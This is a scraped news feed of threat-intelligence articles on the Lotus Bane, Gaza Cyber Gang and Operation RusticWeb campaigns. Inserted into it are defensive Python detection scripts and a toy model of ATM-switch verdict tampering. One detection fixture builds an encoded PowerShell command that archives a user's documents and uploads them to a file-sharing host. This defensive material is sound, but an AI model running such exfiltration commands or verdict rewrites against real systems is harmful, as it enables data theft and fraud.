Entities – INDIA NEWS (http://www.indiavpn.org), feed generated Wed, 06 Mar 2024 16:25:50 +0000

New APT Group ‘Lotus Bane’ Behind Recent Attacks on Vietnam’s Financial Entities
http://www.indiavpn.org/2024/03/06/new-apt-group-lotus-bane-behind-recent-attacks-on-vietnams-financial-entities/
Wed, 06 Mar 2024 16:25:50 +0000

Mar 06, 2024 | Newsroom | Cyber Attack / Malware

A financial entity in Vietnam was the target of a previously undocumented threat actor called Lotus Bane that was first detected in March 2023.

Singapore-headquartered Group-IB described the hacking outfit as an advanced persistent threat group that’s believed to have been active since at least 2022.

The exact specifics of the infection chain are not yet known, but it involves several malicious artifacts, each serving as a stepping stone to the next stage.

“The cybercriminals used methods such as DLL side-loading and data exchange via named pipes to run malicious executables and create remote scheduled tasks for lateral movement,” the company said.
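The three behaviours Group-IB names are all visible in host telemetry. The following is an added example, not Group-IB's code and not anything recovered from Lotus Bane: a small triage pass over constructed Sysmon and Windows Security events that flags an unsigned DLL loaded from the same directory as its host executable outside the system paths (Sysmon Event ID 7, the DLL side-loading pattern), a named pipe created by a process running from a user-writable location (Sysmon Event ID 17, the pattern behind pipe-based tooling such as PIPEDANCE), and a scheduled task registered from a network logon (Security Event ID 4698). The 4698 check assumes the log pipeline has already joined the creator's 4624 LogonType onto the record; the field names follow Sysmon's schema and every sample line is constructed.

```python
"""Triage constructed Sysmon/Security events for DLL side-loading, suspicious
named-pipe creation and remote scheduled-task creation (added example)."""
import json
from pathlib import PureWindowsPath

# Directories from which a DLL load is expected. A DLL that sits beside its EXE
# anywhere else, and is unsigned, is a side-loading candidate.
SYSTEM_DIRS = (
    r"c:\windows\system32",
    r"c:\windows\syswow64",
    r"c:\windows\winsxs",
    r"c:\windows\microsoft.net",
    r"c:\program files",
    r"c:\program files (x86)",
)

# Processes that legitimately create many named pipes; anything else creating a
# pipe from outside the system directories is worth a look.
PIPE_OWNERS = {"svchost.exe", "lsass.exe", "services.exe", "spoolsv.exe", "wininit.exe"}


def _dir(path: str) -> str:
    return str(PureWindowsPath(path).parent).lower()


def _in_system_dir(path: str) -> bool:
    return _dir(path).startswith(SYSTEM_DIRS)


def is_sideload_candidate(ev: dict) -> bool:
    """Sysmon 7: unsigned DLL loaded from the EXE's own directory, outside system paths."""
    if ev.get("EventID") != 7:
        return False
    same_dir = _dir(ev["Image"]) == _dir(ev["ImageLoaded"])
    signed_ok = ev.get("Signed") == "true" and ev.get("SignatureStatus") == "Valid"
    return same_dir and not _in_system_dir(ev["ImageLoaded"]) and not signed_ok


def is_suspicious_pipe(ev: dict) -> bool:
    """Sysmon 17: pipe created by a non-system process running outside system paths."""
    if ev.get("EventID") != 17:
        return False
    proc = PureWindowsPath(ev["Image"]).name.lower()
    return proc not in PIPE_OWNERS and not _in_system_dir(ev["Image"])


def is_remote_task_creation(ev: dict) -> bool:
    """Security 4698 created under a network (type 3) logon, i.e. registered from
    another host. Assumption: LogonType was joined from the matching 4624 upstream."""
    return ev.get("EventID") == 4698 and ev.get("LogonType") == 3


RULES = [
    ("dll_sideload", is_sideload_candidate),
    ("named_pipe", is_suspicious_pipe),
    ("remote_schtask", is_remote_task_creation),
]


def triage(lines):
    """Return [(rule, host, key detail)] for every JSON-lines event that matches a rule."""
    hits = []
    for line in lines:
        ev = json.loads(line)
        for name, rule in RULES:
            if rule(ev):
                detail = ev.get("ImageLoaded") or ev.get("PipeName") or ev.get("TaskName")
                hits.append((name, ev["Computer"], detail))
    return hits


# Constructed sample events; not taken from any real incident.
SAMPLE_LOG = [
    json.dumps({"EventID": 7, "Computer": "WS01", "Image": r"C:\Users\a\AppData\Local\Temp\upd\vendor.exe",
                "ImageLoaded": r"C:\Users\a\AppData\Local\Temp\upd\version.dll",
                "Signed": "false", "SignatureStatus": "Unavailable"}),
    json.dumps({"EventID": 7, "Computer": "WS01", "Image": r"C:\Windows\System32\notepad.exe",
                "ImageLoaded": r"C:\Windows\System32\kernel32.dll", "Signed": "true", "SignatureStatus": "Valid"}),
    json.dumps({"EventID": 17, "Computer": "WS01", "Image": r"C:\Users\a\AppData\Local\Temp\upd\vendor.exe",
                "PipeName": r"\pipe\8a1b-4c"}),
    json.dumps({"EventID": 17, "Computer": "WS01", "Image": r"C:\Windows\System32\svchost.exe",
                "PipeName": r"\pipe\srvsvc"}),
    json.dumps({"EventID": 4698, "Computer": "SRV02", "LogonType": 3, "SubjectUserName": "a",
                "TaskName": r"\Microsoft\Windows\Update\Sync"}),
    json.dumps({"EventID": 4698, "Computer": "SRV02", "LogonType": 2, "SubjectUserName": "admin",
                "TaskName": r"\Backup\Nightly"}),
]

if __name__ == "__main__":
    for hit in triage(SAMPLE_LOG):
        print(hit)
```

Each rule on its own is noisy (installers side-load constantly, and many agents own pipes); the point is the co-occurrence on one host within a short window, which is what an analyst would pivot on after the first hit.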


Group-IB told The Hacker News that the techniques used by Lotus Bane overlap with those of OceanLotus, a Vietnam-aligned threat actor also known as APT32, Canvas Cyclone (formerly Bismuth), and Cobalt Kitty. The overlap stems from the use of malware such as PIPEDANCE for communication over named pipes.

It’s worth noting that PIPEDANCE was first documented by Elastic Security Labs in February 2023 in connection with a cyber attack targeting an unnamed Vietnamese organization in late December 2022.

“This similarity suggests possible connections with or inspirations from OceanLotus, however, the different target industries make it likely that they are different,” Anastasia Tikhonova, head of Threat Intelligence for APAC at Group-IB, said.

“Lotus Bane is actively engaging in attacks primarily targeting the banking sector in the APAC region. Although the known attack was in Vietnam, the sophistication of their methods indicates the potential for broader geographical operations within APAC. The exact duration of their activity prior to this discovery is currently unclear, but ongoing investigations may shed more light on their history.”

The development comes as financial organizations across Asia-Pacific (APAC), Europe, Latin America (LATAM), and North America have been the target of several advanced persistent threat groups such as Blind Eagle and the Lazarus Group over the past year.

Another notable financially motivated threat group is UNC1945, which has been observed targeting ATM switch servers with the goal of infecting them with custom malware called CAKETAP.


“This malware intercepts data transmitted from the ATM server to the [Hardware Security Module] server and checks it against a set of predefined conditions,” Group-IB said. “If these conditions are met, the data is altered before being sent out from the ATM server.”

UNC2891 and UNC1945 were previously detailed by Google-owned Mandiant in March 2022 as having deployed the CAKETAP rootkit on Oracle Solaris systems to intercept messages from an ATM switching network and perform unauthorized cash withdrawals at different banks using fraudulent cards.
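The mechanism described above, reduced to its essentials, is an in-path rewrite of the HSM's verdict for a predefined set of cards. The following is an added example, not CAKETAP and not code from Mandiant or Group-IB: a toy model of a switch-to-HSM PIN-verification exchange in which a hook between the two flips FAIL to OK for listed PANs, shown beside a constructed mitigation in which the HSM returns an HMAC over request and verdict so that a rewritten verdict is reported as tampered instead of honoured. The PANs, PIN blocks and link key are constructed; the article does not say what integrity checks the victims' switches did or did not have.

```python
"""Toy model of an in-path HSM-verdict rewrite and an HMAC check that exposes it
(added example; not CAKETAP, not any vendor's HSM protocol)."""
import hashlib
import hmac
import json

LINK_KEY = b"constructed-switch-hsm-link-key"  # shared by switch application and HSM

# Constructed card table: PAN -> PIN block the HSM accepts. Stands in for the
# PVV/offset check a real HSM performs on an encrypted PIN block.
CARD_DB = {"4111111111111111": "PB-1234", "5500000000000004": "PB-9876"}

# Condition table of the modelled hook: PANs whose verdict gets rewritten
# (the attacker's fraudulent cards in the article's description).
HOOKED_PANS = {"5500000000000004"}


def _mac(req: dict, result: str) -> str:
    """HMAC binding the request (PAN + PIN block) to the verdict."""
    msg = json.dumps([req["pan"], req["pin_block"], result]).encode()
    return hmac.new(LINK_KEY, msg, hashlib.sha256).hexdigest()


def hsm_verify(req: dict) -> dict:
    """HSM side: verdict plus a MAC over request and verdict."""
    result = "OK" if CARD_DB.get(req["pan"]) == req["pin_block"] else "FAIL"
    return {"result": result, "mac": _mac(req, result)}


def in_path_hook(req: dict, resp: dict) -> dict:
    """Models the rootkit between switch and HSM: flips FAIL to OK for listed PANs.
    The MAC is left as-is because the hook does not hold the link key."""
    if req["pan"] in HOOKED_PANS and resp["result"] == "FAIL":
        return {**resp, "result": "OK"}
    return resp


def switch_authorize(pan: str, pin_block: str, check_mac: bool) -> str:
    """Switch side. check_mac=False takes the verdict at face value, as an
    unauthenticated host-to-HSM link does; check_mac=True reports a verdict whose
    MAC no longer matches as TAMPERED."""
    req = {"pan": pan, "pin_block": pin_block}
    resp = in_path_hook(req, hsm_verify(req))
    if check_mac and not hmac.compare_digest(resp["mac"], _mac(req, resp["result"])):
        return "TAMPERED"
    return resp["result"]


if __name__ == "__main__":
    print(switch_authorize("4111111111111111", "PB-1234", check_mac=False))  # OK
    print(switch_authorize("5500000000000004", "PB-0000", check_mac=False))  # OK (rewritten)
    print(switch_authorize("5500000000000004", "PB-0000", check_mac=True))   # TAMPERED
    print(switch_authorize("4111111111111111", "PB-0000", check_mac=True))   # FAIL
```

The caveat a practitioner will spot immediately: a rootkit with kernel-level access on the switch host can hook the MAC comparison as easily as it hooks the socket, so the check only raises the bar when the verdict is validated somewhere the rootkit does not run (a separate authorization host, or an HSM session that refuses unauthenticated commands) and when the host's own integrity is attested independently.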

“The presence and activities of both Lotus Bane and UNC1945 in the APAC region highlight the need for continued vigilance and robust cybersecurity measures,” Tikhonova said. “These groups, with their distinct tactics and targets, underline the complexity of protecting against financial cyber threats in today’s digital landscape.”

New Pierogi++ Malware by Gaza Cyber Gang Targeting Palestinian Entities
http://www.indiavpn.org/2023/12/26/new-pierogi-malware-by-gaza-cyber-gang-targeting-palestinian-entities/
Tue, 26 Dec 2023 14:34:15 +0000

Dec 14, 2023 | Newsroom | Malware / Threat Analysis


A pro-Hamas threat actor known as Gaza Cyber Gang is targeting Palestinian entities using an updated version of a backdoor dubbed Pierogi.

The findings come from SentinelOne, which has given the malware the name Pierogi++ owing to the fact that it’s implemented in the C++ programming language unlike its Delphi- and Pascal-based predecessor.

“Recent Gaza Cybergang activities show consistent targeting of Palestinian entities, with no observed significant changes in dynamics since the start of the Israel-Hamas war,” security researcher Aleksandar Milenkoski said in a report shared with The Hacker News.

Gaza Cyber Gang, believed to be active since at least 2012, has a history of striking targets throughout the Middle East, particularly Israel and Palestine, often leveraging spear-phishing as a method of initial access.


Some of the notable malware families in its arsenal include BarbWire, DropBook, LastConn, Molerat Loader, Micropsia, NimbleMamba, SharpStage, Spark, Pierogi, PoisonIvy, and XtremeRAT among others.

The threat actor is assessed to be a composite of several sub-groups that share overlapping victimology footprints and malware, such as Molerats, Arid Viper, and a cluster referred to as Operation Parliament by Kaspersky.

In recent months, the adversarial collective has been linked to a series of attacks that deliver improvised variants of its Micropsia and Arid Gopher implants as well as a new initial access downloader dubbed IronWind.

The latest set of intrusions mounted by Gaza Cyber Gang has been found to leverage Pierogi++ and Micropsia. The first recorded use of Pierogi++ goes back to late 2022.


Attack chains are characterized by the use of decoy documents written in Arabic or English and pertaining to matters of interest to Palestinians to deliver the backdoors.

Cybereason, which shed light on Pierogi in February 2020, described it as an implant that allows attackers to spy on targeted victims and that the “commands used to communicate with the [command-and-control] servers and other strings in the binary are written in Ukrainian.”


“The backdoor may have been obtained in underground communities rather than home-grown,” it assessed at the time.

Both Pierogi and Pierogi++ are equipped to take screenshots, execute commands, and download attacker-provided files. Another notable aspect is that the updated artifacts no longer feature any Ukrainian strings in the code.

SentinelOne’s investigation into Gaza Cyber Gang’s operations has also yielded tactical connections between two disparate campaigns referred to as Big Bang and Operation Bearded Barbie, in addition to reinforcing ties between the threat actor and WIRTE, as previously disclosed by Kaspersky in November 2021.

The sustained focus on Palestine notwithstanding, the discovery of Pierogi++ underscores that the group continues to refine and retool its malware to ensure successful compromise of targets and to maintain persistent access to their networks.

“The observed overlaps in targeting and malware similarities across the Gaza Cybergang sub-groups after 2018 suggests that the group has likely been undergoing a consolidation process,” Milenkoski said.

“This possibly includes the formation of an internal malware development and maintenance hub and/or streamlining supply from external vendors.”

Rust-Based Malware Targets Indian Government Entities
http://www.indiavpn.org/2023/12/23/rust-based-malware-targets-indian-government-entities/
Sat, 23 Dec 2023 16:25:13 +0000

Dec 22, 2023 | Newsroom | Malware / Cyber Threat


Indian government entities and the defense sector have been targeted by a phishing campaign that’s engineered to drop Rust-based malware for intelligence gathering.

The activity, first detected in October 2023, has been codenamed Operation RusticWeb by enterprise security firm SEQRITE.

“New Rust-based payloads and encrypted PowerShell commands have been utilized to exfiltrate confidential documents to a web-based service engine, instead of a dedicated command-and-control (C2) server,” security researcher Sathwik Ram Prakki said.

Tactical overlaps have been uncovered between the cluster and those widely tracked under the monikers Transparent Tribe and SideCopy, both of which are assessed to be linked to Pakistan.

SideCopy is also a suspected subordinate element within Transparent Tribe. Last month, SEQRITE detailed multiple campaigns undertaken by the threat actor targeting Indian government bodies to deliver numerous trojans such as AllaKore RAT, Ares RAT, and DRat.


Other recent attack chains documented by ThreatMon have employed decoy Microsoft PowerPoint files as well as specially crafted RAR archives that exploit CVE-2023-38831 in WinRAR for malware delivery, ultimately giving the attackers remote access and control.

“The SideCopy APT Group’s infection chain involves multiple steps, each carefully orchestrated to ensure successful compromise,” ThreatMon noted earlier this year.

The latest set of attacks commences with a phishing email, leveraging social engineering techniques to trick victims into interacting with malicious PDF files that drop Rust-based payloads for enumerating the file system in the background while displaying the decoy file to the victim.


Besides amassing files of interest, the malware is equipped to collect system information and transmit it to the C2 server, but it lacks the features of other advanced stealers available in the cybercrime underground.

A second infection chain identified by SEQRITE in December employs a similar multi-stage process but substitutes the Rust malware with a PowerShell script that takes care of the enumeration and exfiltration steps.

But in an interesting twist, the final-stage payload is launched via a Rust executable that goes by the name “Cisco AnyConnect Web Helper.” The gathered information is ultimately uploaded to the oshi[.]at domain, an anonymous public file-sharing service called OshiUpload.
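Two things in the chain just described are hunt-able without any sample in hand: the encrypted or encoded PowerShell that does the enumeration and upload, and exfiltration to a public file-sharing host instead of a C2 server. The following is an added example, not SEQRITE's code: hunting logic over constructed Sysmon process-creation (Event ID 1) and DNS (Event ID 22) records that decodes PowerShell -EncodedCommand arguments and looks for an upload to a sharing host, flags a binary carrying a VPN-client-looking name but running from a user-writable path, and flags resolution of a sharing host by anything other than a browser. oshi.at is the one host the article names; the rest of the host list, the process names, the sample command and the upload call are constructed (the call is illustrative, not the service's documented API).

```python
"""Hunt constructed Sysmon events for encoded-PowerShell uploads, VPN-client
lookalikes in user paths and sharing-host DNS from non-browsers (added example)."""
import base64
import json
import re
from pathlib import PureWindowsPath
from typing import Optional

SHARING_HOSTS = {"oshi.at"}  # the host the article names; extend from your own TI
IMPERSONATED = ("anyconnect", "cisco secure client")  # constructed lookalike terms
USER_WRITABLE = ("c:\\users\\", "c:\\programdata\\", "c:\\windows\\temp\\")
BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe"}

# PowerShell accepts any unambiguous prefix of -EncodedCommand; cover the common ones.
ENC_RE = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.I)
UPLOAD_RE = re.compile(r"Invoke-(?:WebRequest|RestMethod)\b.*-(?:InFile|Body)\b", re.I | re.S)


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Plaintext of a -EncodedCommand argument (base64 of UTF-16LE), or None."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def _mentions_sharing_host(text: str) -> bool:
    return any(h in text.lower() for h in SHARING_HOSTS)


def check_process(ev: dict) -> list:
    """Sysmon 1 checks: decoded PowerShell that uploads, and lookalike binaries."""
    hits = []
    image = ev["Image"].lower()
    name = PureWindowsPath(image).name
    decoded = decode_encoded_command(ev.get("CommandLine", ""))
    if decoded is not None and (_mentions_sharing_host(decoded) or UPLOAD_RE.search(decoded)):
        hits.append("ps_encoded_upload")
    label = name + " " + ev.get("Description", "").lower()
    if any(k in label for k in IMPERSONATED) and image.startswith(USER_WRITABLE):
        hits.append("vpn_client_lookalike_in_user_path")
    return hits


def check_dns(ev: dict) -> list:
    """Sysmon 22 check: a sharing host resolved by a process that is not a browser."""
    proc = PureWindowsPath(ev["Image"]).name.lower()
    if ev["QueryName"].lower() in SHARING_HOSTS and proc not in BROWSERS:
        return ["sharing_host_dns_from_non_browser"]
    return []


def hunt(lines) -> list:
    """Return [(rule, image)] over JSON-lines Sysmon events."""
    out = []
    for line in lines:
        ev = json.loads(line)
        rules = check_process(ev) if ev["EventID"] == 1 else check_dns(ev) if ev["EventID"] == 22 else []
        out.extend((r, ev["Image"]) for r in rules)
    return out


# Constructed samples. The encoded command is built here so it stays readable.
_PS = (r"$f=Get-ChildItem $env:USERPROFILE\Documents -Include *.docx,*.pdf -Recurse;"
       r"Compress-Archive $f $env:TEMP\d.zip;"
       r"Invoke-WebRequest -Uri https://oshi.at -Method Post -InFile $env:TEMP\d.zip")
_ENC = base64.b64encode(_PS.encode("utf-16-le")).decode()
HELPER = r"C:\Users\a\AppData\Roaming\Cisco AnyConnect Web Helper.exe"  # constructed path
SAMPLE_LOG = [
    json.dumps({"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                "CommandLine": f"powershell.exe -nop -w hidden -enc {_ENC}"}),
    json.dumps({"EventID": 1, "Image": HELPER, "Description": "Cisco AnyConnect Web Helper",
                "CommandLine": f'"{HELPER}"'}),
    json.dumps({"EventID": 1, "Image": r"C:\Program Files (x86)\Cisco\Cisco Secure Client\vpnui.exe",
                "Description": "Cisco Secure Client", "CommandLine": "vpnui.exe"}),
    json.dumps({"EventID": 22, "Image": HELPER, "QueryName": "oshi.at"}),
    json.dumps({"EventID": 22, "Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
                "QueryName": "oshi.at"}),
]

if __name__ == "__main__":
    for hit in hunt(SAMPLE_LOG):
        print(hit)
```

The encoded-command decoder is the piece worth keeping: SEQRITE's point is that the script is what carries the enumeration and exfiltration logic, and a hunt that only looks at the process name will never see the sharing host inside a base64 blob. Where Script Block Logging (Event ID 4104) is enabled the decode step is unnecessary, because the plaintext is already logged.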

“Operation RusticWeb could be linked to an APT threat as it shares similarities with various Pakistan-linked groups,” Ram Prakki said.


The disclosure comes nearly two months after Cyble uncovered a malicious Android app utilized by the DoNot Team targeting individuals in the Kashmir region of India.

The nation-state actor, also known by the names APT-C-35, Origami Elephant, and SECTOR02, is believed to be of Indian origin and has a history of utilizing Android malware to infiltrate devices belonging to people in Kashmir and Pakistan.

The variant examined by Cyble is a trojanized version of an open-source GitHub project called “QuranApp: Read and Explore” that comes fitted with a wide range of spyware features to record audio and VoIP calls, capture screenshots, gather data from various apps, download additional APK files, and track the victim’s location.

“The DoNot group’s relentless efforts to refine their tools and techniques underscore the ongoing threat they pose, particularly in their targeting of individuals in the sensitive Kashmir region of India,” Cyble said.
